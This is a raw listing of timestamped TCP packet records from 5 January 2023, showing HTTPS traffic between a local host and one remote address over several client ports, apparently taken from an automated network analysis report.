                                                                                                                                                                                    Jan 5, 2023 08:58:10.874811888 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.874841928 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.874862909 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.874893904 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.874895096 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.874919891 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.874963999 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.874967098 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875035048 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875286102 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875345945 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875370026 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875379086 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875399113 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875422001 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875544071 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875613928 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875646114 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875662088 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875678062 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875716925 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875725985 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875761032 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875797033 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875804901 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875812054 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.875861883 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876027107 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876033068 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876413107 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876462936 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876497030 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876507044 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876523972 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876545906 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876605034 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876641989 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876686096 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876702070 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876732111 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876750946 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876784086 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.876859903 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877023935 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877073050 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877109051 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877127886 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877142906 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877202034 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877424955 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877506018 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877720118 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877774954 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877818108 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877827883 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877841949 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877861023 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.877966881 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878002882 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878030062 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878060102 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878158092 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878206968 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878209114 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878235102 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878237963 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878252983 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878272057 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878283024 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878309011 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878312111 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878312111 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878325939 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878349066 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878365040 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878370047 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878392935 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878398895 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878420115 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878443003 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878469944 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.878494978 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879143953 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879200935 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879220009 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879230022 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879262924 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879301071 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879371881 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879420996 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879441977 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879473925 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879481077 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879513025 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879622936 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879925966 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.879973888 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.880000114 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.880007982 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.880039930 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.880062103 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.895289898 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.895325899 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.895401955 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.895433903 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.895487070 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.895643950 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.896697998 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.896759987 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.896840096 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.896861076 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.896889925 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.896908998 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.896989107 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.897003889 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.897079945 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898114920 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898161888 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898246050 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898266077 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898332119 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898332119 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898840904 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898890018 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898955107 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.898981094 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899017096 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899053097 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899373055 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899403095 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899476051 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899487019 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899504900 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899513960 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899514914 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899583101 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899597883 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899616003 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899637938 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899658918 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899661064 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899683952 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899683952 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899707079 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899771929 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899830103 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899830103 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899883032 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899928093 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899960041 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899971008 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.899997950 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900016069 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900036097 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900042057 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900079012 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900114059 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900121927 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900170088 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900190115 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900192976 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900192976 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900203943 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900227070 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900233984 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900270939 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900304079 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900304079 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900304079 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900306940 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900341988 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900352001 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900398016 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900407076 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900418043 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900439024 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900448084 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900451899 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900451899 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900482893 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900485992 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900485992 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900544882 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900552034 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900552988 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900554895 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900582075 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900583982 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900597095 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900613070 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900626898 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900657892 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900696039 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900705099 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900713921 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900748014 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900764942 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900775909 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900775909 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900793076 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900804043 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900835991 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900850058 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900886059 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900895119 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900899887 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900922060 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900935888 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900948048 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900979996 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.900994062 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901021957 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901051044 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901058912 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901063919 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901087046 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901103973 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901119947 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901141882 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901146889 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901150942 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901175022 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901204109 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901247978 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901248932 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901294947 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901334047 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901350975 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901385069 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901396990 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901408911 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901441097 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901457071 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901498079 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901531935 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901544094 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901560068 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901614904 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901684999 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901695013 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901746988 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901787043 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901801109 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901817083 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901824951 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901885986 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.901921988 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.905203104 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.905299902 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.905349970 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.905378103 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.905405998 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.906168938 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917407036 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917584896 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917689085 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917690039 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917767048 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917793989 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917809010 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917880058 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.917920113 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918263912 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918334961 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918354034 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918358088 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918380022 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918405056 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918431044 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918440104 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918462038 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.918528080 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919084072 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919133902 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919203997 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919230938 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919292927 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919292927 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919471025 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919523001 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919559956 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919573069 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919608116 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919625044 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919805050 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919828892 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919857979 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919864893 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919886112 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919895887 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919969082 CET49731443192.168.2.480.67.82.211
